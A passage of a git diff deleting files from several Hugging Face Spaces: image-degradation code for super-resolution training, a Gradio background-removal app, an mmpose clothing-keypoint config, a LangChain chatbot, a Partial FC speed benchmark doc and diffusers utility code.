# mod crop - h, w = image.shape[:2] - - hq = image.copy() - - if sf == 4 and random.random() < scale2_prob: # downsample1 - if np.random.rand() < 0.5: - image = cv2.resize(image, (int(1 / 2 * image.shape[1]), int(1 / 2 * image.shape[0])), - interpolation=random.choice([1, 2, 3])) - else: - image = util.imresize_np(image, 1 / 2, True) - image = np.clip(image, 0.0, 1.0) - sf = 2 - - shuffle_order = random.sample(range(7), 7) - idx1, idx2 = shuffle_order.index(2), shuffle_order.index(3) - if idx1 > idx2: # keep downsample3 last - shuffle_order[idx1], shuffle_order[idx2] = shuffle_order[idx2], shuffle_order[idx1] - - for i in shuffle_order: - - if i == 0: - image = add_blur(image, sf=sf) - - elif i == 1: - image = add_blur(image, sf=sf) - - elif i == 2: - a, b = image.shape[1], image.shape[0] - # downsample2 - if random.random() < 0.75: - sf1 = random.uniform(1, 2 * sf) - image = cv2.resize(image, (int(1 / sf1 * image.shape[1]), int(1 / sf1 * image.shape[0])), - interpolation=random.choice([1, 2, 3])) - else: - k = fspecial('gaussian', 25, random.uniform(0.1, 0.6 * sf)) - k_shifted = shift_pixel(k, sf) - k_shifted = k_shifted / k_shifted.sum() # blur with shifted kernel - image = ndimage.filters.convolve(image, np.expand_dims(k_shifted, axis=2), mode='mirror') - image = image[0::sf, 0::sf, ...] # nearest downsampling - image = np.clip(image, 0.0, 1.0) - - elif i == 3: - # downsample3 - image = cv2.resize(image, (int(1 / sf * a), int(1 / sf * b)), interpolation=random.choice([1, 2, 3])) - image = np.clip(image, 0.0, 1.0) - - elif i == 4: - # add Gaussian noise - image = add_Gaussian_noise(image, noise_level1=2, noise_level2=25) - - elif i == 5: - # add JPEG noise - if random.random() < jpeg_prob: - image = add_JPEG_noise(image) - - # elif i == 6: - # # add processed camera sensor noise - # if random.random() < isp_prob and isp_model is not None: - # with torch.no_grad(): - # img, hq = isp_model.forward(img.copy(), hq) - - # add final JPEG compression noise - image = add_JPEG_noise(image) - image = util.single2uint(image) - example = {"image":image} - return example - - -# TODO incase there is a pickle error one needs to replace a += x with a = a + x in add_speckle_noise etc... -def degradation_bsrgan_plus(img, sf=4, shuffle_prob=0.5, use_sharp=True, lq_patchsize=64, isp_model=None): - """ - This is an extended degradation model by combining - the degradation models of BSRGAN and Real-ESRGAN - ---------- - img: HXWXC, [0, 1], its size should be large than (lq_patchsizexsf)x(lq_patchsizexsf) - sf: scale factor - use_shuffle: the degradation shuffle - use_sharp: sharpening the img - Returns - ------- - img: low-quality patch, size: lq_patchsizeXlq_patchsizeXC, range: [0, 1] - hq: corresponding high-quality patch, size: (lq_patchsizexsf)X(lq_patchsizexsf)XC, range: [0, 1] - """ - - h1, w1 = img.shape[:2] - img = img.copy()[:w1 - w1 % sf, :h1 - h1 % sf, ...] 
# mod crop - h, w = img.shape[:2] - - if h < lq_patchsize * sf or w < lq_patchsize * sf: - raise ValueError(f'img size ({h1}X{w1}) is too small!') - - if use_sharp: - img = add_sharpening(img) - hq = img.copy() - - if random.random() < shuffle_prob: - shuffle_order = random.sample(range(13), 13) - else: - shuffle_order = list(range(13)) - # local shuffle for noise, JPEG is always the last one - shuffle_order[2:6] = random.sample(shuffle_order[2:6], len(range(2, 6))) - shuffle_order[9:13] = random.sample(shuffle_order[9:13], len(range(9, 13))) - - poisson_prob, speckle_prob, isp_prob = 0.1, 0.1, 0.1 - - for i in shuffle_order: - if i == 0: - img = add_blur(img, sf=sf) - elif i == 1: - img = add_resize(img, sf=sf) - elif i == 2: - img = add_Gaussian_noise(img, noise_level1=2, noise_level2=25) - elif i == 3: - if random.random() < poisson_prob: - img = add_Poisson_noise(img) - elif i == 4: - if random.random() < speckle_prob: - img = add_speckle_noise(img) - elif i == 5: - if random.random() < isp_prob and isp_model is not None: - with torch.no_grad(): - img, hq = isp_model.forward(img.copy(), hq) - elif i == 6: - img = add_JPEG_noise(img) - elif i == 7: - img = add_blur(img, sf=sf) - elif i == 8: - img = add_resize(img, sf=sf) - elif i == 9: - img = add_Gaussian_noise(img, noise_level1=2, noise_level2=25) - elif i == 10: - if random.random() < poisson_prob: - img = add_Poisson_noise(img) - elif i == 11: - if random.random() < speckle_prob: - img = add_speckle_noise(img) - elif i == 12: - if random.random() < isp_prob and isp_model is not None: - with torch.no_grad(): - img, hq = isp_model.forward(img.copy(), hq) - else: - print('check the shuffle!') - - # resize to desired size - img = cv2.resize(img, (int(1 / sf * hq.shape[1]), int(1 / sf * hq.shape[0])), - interpolation=random.choice([1, 2, 3])) - - # add final JPEG compression noise - img = add_JPEG_noise(img) - - # random crop - img, hq = random_crop(img, hq, sf, lq_patchsize) - - return img, hq - - -if __name__ == '__main__': - print("hey") - img = util.imread_uint('utils/test.png', 3) - print(img) - img = util.uint2single(img) - print(img) - img = img[:448, :448] - h = img.shape[0] // 4 - print("resizing to", h) - sf = 4 - deg_fn = partial(degradation_bsrgan_variant, sf=sf) - for i in range(20): - print(i) - img_lq = deg_fn(img) - print(img_lq) - img_lq_bicubic = albumentations.SmallestMaxSize(max_size=h, interpolation=cv2.INTER_CUBIC)(image=img)["image"] - print(img_lq.shape) - print("bicubic", img_lq_bicubic.shape) - print(img_hq.shape) - lq_nearest = cv2.resize(util.single2uint(img_lq), (int(sf * img_lq.shape[1]), int(sf * img_lq.shape[0])), - interpolation=0) - lq_bicubic_nearest = cv2.resize(util.single2uint(img_lq_bicubic), (int(sf * img_lq.shape[1]), int(sf * img_lq.shape[0])), - interpolation=0) - img_concat = np.concatenate([lq_bicubic_nearest, lq_nearest, util.single2uint(img_hq)], axis=1) - util.imsave(img_concat, str(i) + '.png') - - diff --git a/spaces/AIlexDev/Einfach.Hintergrund/app.py b/spaces/AIlexDev/Einfach.Hintergrund/app.py deleted file mode 100644 index e4c1d36e51dc6974ea82a7a6bb43db35f8125743..0000000000000000000000000000000000000000 --- a/spaces/AIlexDev/Einfach.Hintergrund/app.py +++ /dev/null @@ -1,154 +0,0 @@ -import cv2 -import gradio as gr -import os -from PIL import Image -import numpy as np -import torch -from torch.autograd import Variable -from torchvision import transforms -import torch.nn.functional as F -import gdown -import matplotlib.pyplot as plt -import warnings -warnings.filterwarnings("ignore") 
- -os.system("git clone https://github.com/xuebinqin/DIS") -os.system("mv DIS/IS-Net/* .") - -# project imports -from data_loader_cache import normalize, im_reader, im_preprocess -from models import * - -#Helpers -device = 'cuda' if torch.cuda.is_available() else 'cpu' - -# Download official weights -if not os.path.exists("saved_models"): - os.mkdir("saved_models") - MODEL_PATH_URL = "https://drive.google.com/uc?id=1KyMpRjewZdyYfxHPYcd-ZbanIXtin0Sn" - gdown.download(MODEL_PATH_URL, "saved_models/isnet.pth", use_cookies=False) - -class GOSNormalize(object): - ''' - Normalize the Image using torch.transforms - ''' - def __init__(self, mean=[0.485,0.456,0.406], std=[0.229,0.224,0.225]): - self.mean = mean - self.std = std - - def __call__(self,image): - image = normalize(image,self.mean,self.std) - return image - - -transform = transforms.Compose([GOSNormalize([0.5,0.5,0.5],[1.0,1.0,1.0])]) - -def load_image(im_path, hypar): - im = im_reader(im_path) - im, im_shp = im_preprocess(im, hypar["cache_size"]) - im = torch.divide(im,255.0) - shape = torch.from_numpy(np.array(im_shp)) - return transform(im).unsqueeze(0), shape.unsqueeze(0) # make a batch of image, shape - - -def build_model(hypar,device): - net = hypar["model"]#GOSNETINC(3,1) - - # convert to half precision - if(hypar["model_digit"]=="half"): - net.half() - for layer in net.modules(): - if isinstance(layer, nn.BatchNorm2d): - layer.float() - - net.to(device) - - if(hypar["restore_model"]!=""): - net.load_state_dict(torch.load(hypar["model_path"]+"/"+hypar["restore_model"], map_location=device)) - net.to(device) - net.eval() - return net - - -def predict(net, inputs_val, shapes_val, hypar, device): - ''' - Given an Image, predict the mask - ''' - net.eval() - - if(hypar["model_digit"]=="full"): - inputs_val = inputs_val.type(torch.FloatTensor) - else: - inputs_val = inputs_val.type(torch.HalfTensor) - - - inputs_val_v = Variable(inputs_val, requires_grad=False).to(device) # wrap inputs in Variable - - ds_val = net(inputs_val_v)[0] # list of 6 results - - pred_val = ds_val[0][0,:,:,:] # B x 1 x H x W # we want the first one which is the most accurate prediction - - ## recover the prediction spatial size to the orignal image size - pred_val = torch.squeeze(F.upsample(torch.unsqueeze(pred_val,0),(shapes_val[0][0],shapes_val[0][1]),mode='bilinear')) - - ma = torch.max(pred_val) - mi = torch.min(pred_val) - pred_val = (pred_val-mi)/(ma-mi) # max = 1 - - if device == 'cuda': torch.cuda.empty_cache() - return (pred_val.detach().cpu().numpy()*255).astype(np.uint8) # it is the mask we need - -# Set Parameters -hypar = {} # paramters for inferencing - - -hypar["model_path"] ="./saved_models" ## load trained weights from this path -hypar["restore_model"] = "isnet.pth" ## name of the to-be-loaded weights -hypar["interm_sup"] = False ## indicate if activate intermediate feature supervision - -## choose floating point accuracy -- -hypar["model_digit"] = "full" ## indicates "half" or "full" accuracy of float number -hypar["seed"] = 0 - -hypar["cache_size"] = [1024, 1024] ## cached input spatial resolution, can be configured into different size - -## data augmentation parameters --- -hypar["input_size"] = [1024, 1024] ## mdoel input spatial size, usually use the same value hypar["cache_size"], which means we don't further resize the images -hypar["crop_size"] = [1024, 1024] ## random crop size from the input, it is usually set as smaller than hypar["cache_size"], e.g., [920,920] for data augmentation - -hypar["model"] = ISNetDIS() - - # Build Model 
-net = build_model(hypar, device) - - -def inference(image): - image_path = image - - image_tensor, orig_size = load_image(image_path, hypar) - mask = predict(net, image_tensor, orig_size, hypar, device) - - pil_mask = Image.fromarray(mask).convert('L') - im_rgb = Image.open(image).convert("RGB") - - im_rgba = im_rgb.copy() - im_rgba.putalpha(pil_mask) - - return [im_rgba, pil_mask] - - -title = "Akkurater Hintergrund Entferner" -description = "" -article = "
    " - -interface = gr.Interface( - fn=inference, - inputs=gr.Image(type='filepath'), - outputs=["image", "image"], - examples=[['robot.png'], ['ship.png']], - title=title, - description=description, - article=article, - allow_flagging='never', - cache_examples=False, - ).queue(concurrency_count=1, api_open=True).launch(show_api=True, show_error=True) \ No newline at end of file diff --git a/spaces/ATang0729/Forecast4Muses/Model/Model6/Model6_1_ClothesKeyPoint/mmpose_1_x/configs/fashion_2d_keypoint/topdown_heatmap/deepfashion2/td_hm_res50_4xb32-120e_deepfashion2_sling_256x192.py b/spaces/ATang0729/Forecast4Muses/Model/Model6/Model6_1_ClothesKeyPoint/mmpose_1_x/configs/fashion_2d_keypoint/topdown_heatmap/deepfashion2/td_hm_res50_4xb32-120e_deepfashion2_sling_256x192.py deleted file mode 100644 index 188833c3b5603842ad864a75f3ff936687c0d8ca..0000000000000000000000000000000000000000 --- a/spaces/ATang0729/Forecast4Muses/Model/Model6/Model6_1_ClothesKeyPoint/mmpose_1_x/configs/fashion_2d_keypoint/topdown_heatmap/deepfashion2/td_hm_res50_4xb32-120e_deepfashion2_sling_256x192.py +++ /dev/null @@ -1,172 +0,0 @@ -_base_ = [ - '../../../_base_/default_runtime.py', - '../../../_base_/datasets/deepfashion2.py' -] - -default_hooks = dict(checkpoint=dict(save_best='PCK', rule='greater')) - -resume = False # 断点恢复 -load_from = None # 模型权重加载 -train_cfg = dict(by_epoch=True, max_epochs=120, val_interval=10) # 训练轮数,测试间隔 -param_scheduler = [ - dict( # warmup策略 - type='LinearLR', - begin=0, - end=500, - start_factor=0.001, - by_epoch=False), - dict( # scheduler - type='MultiStepLR', - begin=0, - end=120, - milestones=[80, 100], - gamma=0.1, - by_epoch=True) -] -optim_wrapper = dict(optimizer=dict(type='Adam', lr=0.0005)) # 优化器和学习率 -auto_scale_lr = dict(base_batch_size=512) # 根据batch_size自动缩放学习率 - -backend_args = dict(backend='local') # 数据加载后端设置,默认从本地硬盘加载 -dataset_type = 'DeepFashion2Dataset' # 数据集类名 DeepFashionDataset -data_mode = 'topdown' # 算法结构类型,用于指定标注信息加载策略 -data_root = 'data/deepfashion2/' # 数据存放路径 -# 定义数据编解码器,用于生成target和对pred进行解码,同时包含了输入图片和输出heatmap尺寸等信息 -codec = dict( - type='MSRAHeatmap', input_size=(192, 256), heatmap_size=(48, 64), sigma=2) - -train_pipeline = [ - dict(type='LoadImage'), - dict(type='GetBBoxCenterScale'), - dict(type='RandomFlip', direction='horizontal'), - dict( - type='RandomBBoxTransform', - shift_prob=0, - rotate_factor=60, - scale_factor=(0.75, 1.25)), - dict(type='TopdownAffine', input_size=codec['input_size']), - dict(type='GenerateTarget', encoder=codec), - dict(type='PackPoseInputs') -] -val_pipeline = [ # 测试时数据增强 - dict(type='LoadImage', backend_args=backend_args), # 加载图片 - dict(type='GetBBoxCenterScale'), # 根据bbox获取center和scale - dict(type='TopdownAffine', input_size=codec['input_size']), # 根据变换矩阵更新目标数据 - dict(type='PackPoseInputs') # 对target进行打包用于训练 -] -train_dataloader = dict( # 训练数据加载 - batch_size=32, # 批次大小 - num_workers=6, # 数据加载进程数 - persistent_workers=True, # 在不活跃时维持进程不终止,避免反复启动进程的开销 - sampler=dict(type='DefaultSampler', shuffle=True), # 采样策略,打乱数据 - dataset=dict( - type=dataset_type, # 数据集类名 - data_root=data_root, # 数据集路径 - data_mode=data_mode, # 算法类型 - ann_file='train/deepfashion2_sling.json', # 标注文件路径 - data_prefix=dict(img='train/image/'), # 图像路径 - pipeline=train_pipeline # 数据流水线 - )) -val_dataloader = dict( - batch_size=32, - num_workers=6, - persistent_workers=True, # 在不活跃时维持进程不终止,避免反复启动进程的开销 - drop_last=False, - sampler=dict(type='DefaultSampler', shuffle=False), # 采样策略,不进行打乱 - dataset=dict( - type=dataset_type, # 数据集类名 - data_root=data_root, # 数据集路径 - 
data_mode=data_mode, # 算法类型 - ann_file='validation/deepfashion2_sling.json', # 标注文件路径 - data_prefix=dict(img='validation/image/'), # 图像路径 - test_mode=True, # 测试模式开关 - pipeline=val_pipeline # 数据流水线 - )) -test_dataloader = val_dataloader # 默认情况下不区分验证集和测试集,用户根据需要来自行定义 - -channel_cfg = dict( - num_output_channels=294, - dataset_joints=294, - dataset_channel=[ - [ - 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, - 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, - 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, - 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, - 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, - 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, - 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, - 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, - 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, - 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, - 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, - 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, - 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, - 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, - 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, - 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, - 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, - 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, - 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, - 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, - 285, 286, 287, 288, 289, 290, 291, 292, 293 - ], - ], - inference_channel=[ - 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, - 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, - 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, - 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, - 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, - 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, - 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, - 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, - 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, - 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, - 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, - 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, - 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, - 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, - 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, - 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, - 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, - 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, - 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, - 290, 291, 292, 293 - ]) - -model = dict( - type='TopdownPoseEstimator', # 模型结构决定了算法流程 - data_preprocessor=dict( # 数据归一化和通道顺序调整,作为模型的一部分 - type='PoseDataPreprocessor', - mean=[123.675, 116.28, 103.53], - std=[58.395, 57.12, 57.375], - bgr_to_rgb=True), - backbone=dict( - type='ResNet', - depth=50, - init_cfg=dict( - type='Pretrained', # 预训练参数,只加载backbone权重用于迁移学习 - 
checkpoint='torchvision://resnet50')), - head=dict( # 模型头部 - type='HeatmapHead', - in_channels=2048, - out_channels=channel_cfg['num_output_channels'], - # deconv_out_channels=None, - loss=dict(type='KeypointMSELoss', use_target_weight=True), # 损失函数 - decoder=codec), # 解码器,将heatmap解码成坐标值 - test_cfg=dict( - flip_test=True, # 开启测试时水平翻转集成 - flip_mode='heatmap', # 对heatmap进行翻转 - shift_heatmap=True, # 对翻转后的结果进行平移提高精度 - )) - -val_evaluator = [ - dict(type='PCKAccuracy', thr=0.2), - dict(type='AUC'), - dict(type='EPE'), -] -test_evaluator = val_evaluator # 默认情况下不区分验证集和测试集,用户根据需要来自行定义 - -visualizer = dict( - vis_backends=[dict(type='LocalVisBackend'), - dict(type='WandbVisBackend')]) diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/click/Factory.d.ts b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/click/Factory.d.ts deleted file mode 100644 index 448177fa9e71a4fa977b2da4a9ded95e21d08a35..0000000000000000000000000000000000000000 --- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/click/Factory.d.ts +++ /dev/null @@ -1,7 +0,0 @@ -// import * as Phaser from 'phaser'; -import Click from "./Click"; - -export default function ( - gameObject: Phaser.GameObjects.GameObject, - config?: Click.IConfig -): Click; \ No newline at end of file diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/dynamictext/Factory.d.ts b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/dynamictext/Factory.d.ts deleted file mode 100644 index 1187d805f4e244c96fd68e7640de62f787da5c2d..0000000000000000000000000000000000000000 --- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/dynamictext/Factory.d.ts +++ /dev/null @@ -1,5 +0,0 @@ -import DynamicText from "./DynamicText"; - -export default function ( - config?: DynamicText.IConfig -): DynamicText; \ No newline at end of file diff --git a/spaces/Ajaymekala/gradiolangchainChatBotOpenAI-1/app.py b/spaces/Ajaymekala/gradiolangchainChatBotOpenAI-1/app.py deleted file mode 100644 index a362dcc7d0ddd1eee86961f1bc3db6d894fbd3d5..0000000000000000000000000000000000000000 --- a/spaces/Ajaymekala/gradiolangchainChatBotOpenAI-1/app.py +++ /dev/null @@ -1,34 +0,0 @@ -import os -import gradio as gr -from langchain.chat_models import ChatOpenAI -from langchain import LLMChain, PromptTemplate -from langchain.memory import ConversationBufferMemory - -OPENAI_API_KEY=os.getenv('OPENAI_API_KEY') - -template = """You are a helpful assistant to answer all user queries. -{chat_history} -User: {user_message} -Chatbot:""" - -prompt = PromptTemplate( - input_variables=["chat_history", "user_message"], template=template -) - -memory = ConversationBufferMemory(memory_key="chat_history") - -llm_chain = LLMChain( - llm=ChatOpenAI(temperature='0.5', model_name="gpt-3.5-turbo"), - prompt=prompt, - verbose=True, - memory=memory, -) - -def get_text_response(user_message,history): - response = llm_chain.predict(user_message = user_message) - return response - -demo = gr.ChatInterface(get_text_response) - -if __name__ == "__main__": - demo.launch() #To create a public link, set `share=True` in `launch()`. To enable errors and logs, set `debug=True` in `launch()`. 
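A side note on the chatbot app above: `ConversationBufferMemory` is what fills the `{chat_history}` slot of the prompt template, so each call to `llm_chain.predict` sees the earlier turns. The sketch below shows that mechanism in isolation, independent of the Gradio interface; the strings and the printed output are illustrative, not taken from the original file.

```python
from langchain.memory import ConversationBufferMemory

# Store one exchange, then inspect what would be injected as {chat_history}
# on the next prediction.
memory = ConversationBufferMemory(memory_key="chat_history")
memory.save_context({"user_message": "Hi"}, {"output": "Hello! How can I help?"})
print(memory.load_memory_variables({}))
# Roughly: {'chat_history': 'Human: Hi\nAI: Hello! How can I help?'}
```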
diff --git a/spaces/Alpaca233/SadTalker/src/face3d/models/arcface_torch/docs/speed_benchmark.md b/spaces/Alpaca233/SadTalker/src/face3d/models/arcface_torch/docs/speed_benchmark.md deleted file mode 100644 index 055aee0defe2c43a523ced48260242f0f99b7cea..0000000000000000000000000000000000000000 --- a/spaces/Alpaca233/SadTalker/src/face3d/models/arcface_torch/docs/speed_benchmark.md +++ /dev/null @@ -1,93 +0,0 @@ -## Test Training Speed - -- Test Commands - -You need to use the following two commands to test the Partial FC training performance. -The number of identites is **3 millions** (synthetic data), turn mixed precision training on, backbone is resnet50, -batch size is 1024. -```shell -# Model Parallel -python -m torch.distributed.launch --nproc_per_node=8 --nnodes=1 --node_rank=0 --master_addr="127.0.0.1" --master_port=1234 train.py configs/3millions -# Partial FC 0.1 -python -m torch.distributed.launch --nproc_per_node=8 --nnodes=1 --node_rank=0 --master_addr="127.0.0.1" --master_port=1234 train.py configs/3millions_pfc -``` - -- GPU Memory - -``` -# (Model Parallel) gpustat -i -[0] Tesla V100-SXM2-32GB | 64'C, 94 % | 30338 / 32510 MB -[1] Tesla V100-SXM2-32GB | 60'C, 99 % | 28876 / 32510 MB -[2] Tesla V100-SXM2-32GB | 60'C, 99 % | 28872 / 32510 MB -[3] Tesla V100-SXM2-32GB | 69'C, 99 % | 28872 / 32510 MB -[4] Tesla V100-SXM2-32GB | 66'C, 99 % | 28888 / 32510 MB -[5] Tesla V100-SXM2-32GB | 60'C, 99 % | 28932 / 32510 MB -[6] Tesla V100-SXM2-32GB | 68'C, 100 % | 28916 / 32510 MB -[7] Tesla V100-SXM2-32GB | 65'C, 99 % | 28860 / 32510 MB - -# (Partial FC 0.1) gpustat -i -[0] Tesla V100-SXM2-32GB | 60'C, 95 % | 10488 / 32510 MB │······················· -[1] Tesla V100-SXM2-32GB | 60'C, 97 % | 10344 / 32510 MB │······················· -[2] Tesla V100-SXM2-32GB | 61'C, 95 % | 10340 / 32510 MB │······················· -[3] Tesla V100-SXM2-32GB | 66'C, 95 % | 10340 / 32510 MB │······················· -[4] Tesla V100-SXM2-32GB | 65'C, 94 % | 10356 / 32510 MB │······················· -[5] Tesla V100-SXM2-32GB | 61'C, 95 % | 10400 / 32510 MB │······················· -[6] Tesla V100-SXM2-32GB | 68'C, 96 % | 10384 / 32510 MB │······················· -[7] Tesla V100-SXM2-32GB | 64'C, 95 % | 10328 / 32510 MB │······················· -``` - -- Training Speed - -```python -# (Model Parallel) trainging.log -Training: Speed 2271.33 samples/sec Loss 1.1624 LearningRate 0.2000 Epoch: 0 Global Step: 100 -Training: Speed 2269.94 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 150 -Training: Speed 2272.67 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 200 -Training: Speed 2266.55 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 250 -Training: Speed 2272.54 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 300 - -# (Partial FC 0.1) trainging.log -Training: Speed 5299.56 samples/sec Loss 1.0965 LearningRate 0.2000 Epoch: 0 Global Step: 100 -Training: Speed 5296.37 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 150 -Training: Speed 5304.37 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 200 -Training: Speed 5274.43 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 250 -Training: Speed 5300.10 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 300 -``` - -In this test case, Partial FC 0.1 only use1 1/3 of the GPU memory of the model parallel, -and the training speed is 2.5 times faster than the model parallel. - - -## Speed Benchmark - -1. 
Training speed of different parallel methods (samples/second), Tesla V100 32GB * 8. (Larger is better) - -| Number of Identities in Dataset | Data Parallel | Model Parallel | Partial FC 0.1 | -| :--- | :--- | :--- | :--- | -|125000 | 4681 | 4824 | 5004 | -|250000 | 4047 | 4521 | 4976 | -|500000 | 3087 | 4013 | 4900 | -|1000000 | 2090 | 3449 | 4803 | -|1400000 | 1672 | 3043 | 4738 | -|2000000 | - | 2593 | 4626 | -|4000000 | - | 1748 | 4208 | -|5500000 | - | 1389 | 3975 | -|8000000 | - | - | 3565 | -|16000000 | - | - | 2679 | -|29000000 | - | - | 1855 | - -2. GPU memory cost of different parallel methods (GB per GPU), Tesla V100 32GB * 8. (Smaller is better) - -| Number of Identities in Dataset | Data Parallel | Model Parallel | Partial FC 0.1 | -| :--- | :--- | :--- | :--- | -|125000 | 7358 | 5306 | 4868 | -|250000 | 9940 | 5826 | 5004 | -|500000 | 14220 | 7114 | 5202 | -|1000000 | 23708 | 9966 | 5620 | -|1400000 | 32252 | 11178 | 6056 | -|2000000 | - | 13978 | 6472 | -|4000000 | - | 23238 | 8284 | -|5500000 | - | 32188 | 9854 | -|8000000 | - | - | 12310 | -|16000000 | - | - | 19950 | -|29000000 | - | - | 32324 | diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/ddim_inverse.md b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/ddim_inverse.md deleted file mode 100644 index 5096a3cee283d7a59eeedc48b1dea5080c46aa21..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/ddim_inverse.md +++ /dev/null @@ -1,21 +0,0 @@ - - -# Inverse Denoising Diffusion Implicit Models (DDIMInverse) - -## Overview - -This scheduler is the inverted scheduler of [Denoising Diffusion Implicit Models](https://arxiv.org/abs/2010.02502) (DDIM) by Jiaming Song, Chenlin Meng and Stefano Ermon. -The implementation is mostly based on the DDIM inversion definition of [Null-text Inversion for Editing Real Images using Guided Diffusion Models](https://arxiv.org/pdf/2211.09794.pdf) - -## DDIMInverseScheduler -[[autodoc]] DDIMInverseScheduler diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/utils/check_copies.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/utils/check_copies.py deleted file mode 100644 index 0ba573bb920eeb6787487f043db3c2896b656b92..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/utils/check_copies.py +++ /dev/null @@ -1,213 +0,0 @@ -# coding=utf-8 -# Copyright 2023 The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -import argparse -import glob -import importlib.util -import os -import re - -import black -from doc_builder.style_doc import style_docstrings_in_code - - -# All paths are set with the intent you should run this script from the root of the repo with the command -# python utils/check_copies.py -DIFFUSERS_PATH = "src/diffusers" -REPO_PATH = "." - - -# This is to make sure the diffusers module imported is the one in the repo. 
-spec = importlib.util.spec_from_file_location( - "diffusers", - os.path.join(DIFFUSERS_PATH, "__init__.py"), - submodule_search_locations=[DIFFUSERS_PATH], -) -diffusers_module = spec.loader.load_module() - - -def _should_continue(line, indent): - return line.startswith(indent) or len(line) <= 1 or re.search(r"^\s*\)(\s*->.*:|:)\s*$", line) is not None - - -def find_code_in_diffusers(object_name): - """Find and return the code source code of `object_name`.""" - parts = object_name.split(".") - i = 0 - - # First let's find the module where our object lives. - module = parts[i] - while i < len(parts) and not os.path.isfile(os.path.join(DIFFUSERS_PATH, f"{module}.py")): - i += 1 - if i < len(parts): - module = os.path.join(module, parts[i]) - if i >= len(parts): - raise ValueError(f"`object_name` should begin with the name of a module of diffusers but got {object_name}.") - - with open(os.path.join(DIFFUSERS_PATH, f"{module}.py"), "r", 